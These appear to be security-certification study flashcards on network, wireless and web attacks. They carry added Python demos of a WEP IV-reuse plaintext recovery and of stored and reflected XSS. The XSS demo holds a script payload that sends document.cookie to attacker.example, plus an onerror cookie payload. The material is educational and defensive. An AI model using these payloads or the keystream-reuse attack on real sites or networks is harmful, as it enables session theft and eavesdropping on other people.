- Eavesdropping (greatest threat): enable SRTP (Secure Real-time Transport Protocol)
- Toll fraud
- Vishing: phishing over the phone
- SPIT: spam over Internet telephony
- Performance issues: jitter, latency
VPN - tunneling
A function of VPNs: a tunnel encapsulates one protocol within another protocol to create a virtual network.
- Can encrypt the original IP headers
- Can encrypt the data
- Allows for routing non-routable protocols and IP addresses
- Can provide remote/internal IP addresses
Different protocols: PPTP, L2TP, IPsec
WAN - Circuit Switching
Anything that has to do with the telephone system.
All data follow the same path
PSTN
ISDN
DSL
T-Carriers
WAP
Wireless Application Protocol: a protocol developed mainly to allow wireless devices (cell phones) access to the Internet.
- Requires a gateway to translate between WAP and HTML (see visual)
- Uses WTLS to encrypt data (a modified version of TLS)
- Uses HMAC for message authentication
- WAP gap* problem: the gateway decrypts WTLS and re-encrypts to TLS, so data is briefly in cleartext on the gateway (see visual and explain)
- A lot of wireless devices don't need WAP anymore.
Wardialing
Remote access (RAS) attack: dialing through a range of phone numbers to find one that answers with a modem.
WEP
WEP Wired Equivalent Privacy
- Shared-key authentication (one password for everyone)
- Weak IV (24-bit initialization vector): repeats quickly on a busy network
- IV transmitted in cleartext
- RC4 (stream cipher); easily crackable once IVs repeat
- Only option for the original 802.11b
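The WEP card lists a 24-bit cleartext IV, a shared key and RC4; the following is an added example, not from the original flashcards, that shows why that combination fails. It implements textbook RC4 and WEP's per-packet key (IV prepended to the shared key, without WEP's CRC-32 ICV), reuses an IV across two frames, and recovers the second plaintext from the first using only the XOR of the ciphertexts. It also computes the birthday-bound probability that an IV repeats after a given number of frames. The key and frames are constructed.

```python
"""Added example: why WEP's 24-bit IV is fatal.

Not from the original flashcards. Implements textbook RC4 and the WEP
per-packet key (IV || shared key) without WEP's CRC-32 ICV; the key and
frames are constructed sample values.
"""
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the keystream into the data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, shared_key: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: cleartext IV followed by RC4(IV || key, plaintext)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + shared_key, plaintext)


def recover_with_reused_iv(frame1: bytes, known_plaintext1: bytes, frame2: bytes) -> bytes:
    """Same IV => same keystream, so C1 ^ C2 = P1 ^ P2; knowing P1 yields P2."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("IVs differ; keystream was not reused")
    c1, c2 = frame1[3:], frame2[3:]
    return bytes(a ^ b ^ p for a, b, p in zip(c1, c2, known_plaintext1))


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: chance that at least one IV repeats after this many frames."""
    space = 2 ** iv_bits
    return 1 - math.exp(-frames * (frames - 1) / (2 * space))


def demo() -> bytes:
    key = b"\x01\x02\x03\x04\x05"                 # constructed 40-bit WEP key
    iv = b"\x13\x37\x42"
    known = b"GET /index.html HTTP/1.0"            # guessable: a web request
    frame1 = wep_encrypt(iv, key, known)
    frame2 = wep_encrypt(iv, key, b"password=hunter2 secret!")   # same IV reused
    return recover_with_reused_iv(frame1, known, frame2)         # second plaintext
```

With 2^24 possible IVs, the birthday bound puts a repeat at better than even odds after roughly five thousand frames, i.e. minutes on a busy access point; the attack here needs only one known plaintext and no knowledge of the shared key at all, which is before the RC4 key-scheduling weaknesses that recover the key itself are even considered.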
Wireless Security Problems
- Unauthorized access
- Sniffing
- War driving
- Unauthorized (rogue) access points (man in the middle)
Worm
Similar to a virus, but does not need a host program or user action; it is self-replicating across the network.
WPA
Wi-Fi Protected Access
- Stronger (48-bit) IV
- Introduced TKIP (per-packet key mixing and a message integrity check)
- Still used RC4, because it needed to maintain backward compatibility with WEP hardware
WPA2
Wi-Fi Protected Access 2 (the 802.11i standard)
- AES
- CCMP
- NOT backward compatible with WEP-era hardware
WPA and WPA2 Enterprise
- Uses 802.1X authentication so that each user has individual credentials rather than one shared passphrase
- Authentication is checked against a RADIUS server
Firewall Static Packet Filter
Layer 3: static packet filtering, i.e. a screening router with access control lists; all-or-nothing decisions per packet.
Layer 5: stateful firewalls.
Session Hijack
Where an attacker steps in between two hosts and either monitors the exchange or, often, disconnects one of them and takes over its session. Session hijacks are a type of man-in-the-middle attack. Encryption prevents sniffing, and mutual authentication (binding the session to the authenticated parties) would prevent session hijacking.
Cross-site request forgery is a related web attack: it rides on the victim's existing authenticated session rather than stealing it.
Firewall Best Practices
media gateway
The translation point between disparate telecommunications networks. VoIP media gateways perform the conversion between time-division-multiplexed (TDM) voice and VoIP. As a security measure, the number of calls via media gateways should be limited to avoid DoS, hijacking, etc.
Persistant XSS vulnerability
Targets web sites that let users input data that is stored in a database or similar location and later displayed to other users. The injected code runs automatically for every visitor, without having to lure an unsuspecting user to a crafted link.
AKA second-order vulnerability
non persistant vulnerabilty
Enables an attacker to inject malicious code into a vulnerable web page via a crafted link (reflected XSS). An unsuspecting user visits the infected page, a rogue script runs in the victim's browser and steals sensitive information such as cookies or session IDs.
DOM Attack
Cross-site scripting that uses the Document Object Model: client-side JavaScript on the page reads attacker-controlled data (e.g. from the URL) and writes it into the DOM, causing the victim's browser to execute the malicious JavaScript. The payload may never reach the server.
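The three XSS cards above differ only in where the payload comes from; the fix on the server side is the same: encode untrusted data for the context it is written into. The following is an added example, not from the original flashcards, with a stored-comment renderer and a reflected search page, each in a vulnerable and an output-encoded form. The comment rows and payloads are constructed; DOM-based XSS executes purely in the browser and is not reproduced here.

```python
"""Added example: stored and reflected XSS, vulnerable versus output-encoded.

Not from the original flashcards. The comment list and query string are
constructed; DOM-based XSS happens in the browser and is not shown here.
"""
import html


def render_comments(comments, escape_output: bool) -> str:
    """Stored (persistent) XSS: rows come from the database and are shown to
    every visitor, so one malicious entry hits all of them."""
    items = []
    for text in comments:
        body = html.escape(text, quote=True) if escape_output else text
        items.append(f"<li>{body}</li>")
    return "<ul>" + "".join(items) + "</ul>"


def render_search(query: str, escape_output: bool) -> str:
    """Reflected (non-persistent) XSS: the payload rides in a link the victim
    is lured into clicking and is echoed straight back into the page."""
    body = html.escape(query, quote=True) if escape_output else query
    return f"<p>Results for: {body}</p>"


def contains_injected_tag(markup: str) -> bool:
    """Crude check used only by this example: did the payload survive as a tag?"""
    lowered = markup.lower()
    return "<script" in lowered or "<img" in lowered


# Constructed payloads and database rows.
STORED_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
REFLECTED_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'
COMMENTS = ["Great article!", STORED_PAYLOAD]


def demo() -> dict:
    """True means the payload was emitted as live markup."""
    return {
        "stored_vulnerable": contains_injected_tag(render_comments(COMMENTS, False)),
        "stored_escaped": contains_injected_tag(render_comments(COMMENTS, True)),
        "reflected_vulnerable": contains_injected_tag(render_search(REFLECTED_PAYLOAD, False)),
        "reflected_escaped": contains_injected_tag(render_search(REFLECTED_PAYLOAD, True)),
    }
```

html.escape is correct for text placed inside an element body or a quoted attribute; data written into a JavaScript block, a URL or an unquoted attribute needs a different encoder, which is why templating engines that escape by default are preferable to hand-rolled concatenation.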
IGP
Interior Gateway Protocol: handles routing within a single AS (autonomous system). Routing between autonomous systems is the job of an exterior gateway protocol (BGP).
IGRP
Interior Gateway Routing Protocol: a distance-vector routing protocol that was developed by Cisco.
RIP (Routing Information Protocol) is a standard that outlines how routers exchange routing-table data. It is considered a distance-vector protocol, which means it calculates the shortest path from source to destination by hop count.
IGRP scales better but is proprietary to Cisco; RIP is an open standard.
type of routing protocols
Indicate how routers talk to each other.
2 types:
distance vector and link state routing
- Distance vector: just looks at the number of hops (RIP, IGRP); neighbors periodically exchange their routing tables
- Link state: builds a topology database of the network and looks at more variables than the number of hops (OSPF)
EAP
Extensible Auth Protocol
Provides a framework to enable many type of authentifiation techniques.
IEEE standards
- 802.1AR: Secure Device Identity, a unique identity for a device
- 802.1AE: MACsec, data encryption and integrity at Layer 2
- 802.1AF: key agreement for MACsec session keys
hypervisor
The software component that carries out virtual machine management and oversees guest system software execution.
Common ports
ftp, telnet, smtp, dns
FTP - Port 21
Telnet - Port 23
SMTP - Port 25
DNS - Port 53
ip header protcol number
UDP, IGMP, TCP, ICMP
Service: protocol number
- Internet Control Message Protocol (ICMP): 1
- Internet Group Management Protocol (IGMP): 2
- Transmission Control Protocol (TCP): 6
- User Datagram Protocol (UDP): 17
- Generic Routing Encapsulation (GRE, carries PPTP data): 47
Secure HTTP (S-HTTP)
An early standard for encrypting HTTP documents, Secure HTTP (S-HTTP) is designed to secure individual messages. SSL/TLS (HTTPS) instead establishes a secure connection between two computers and protects everything sent over it.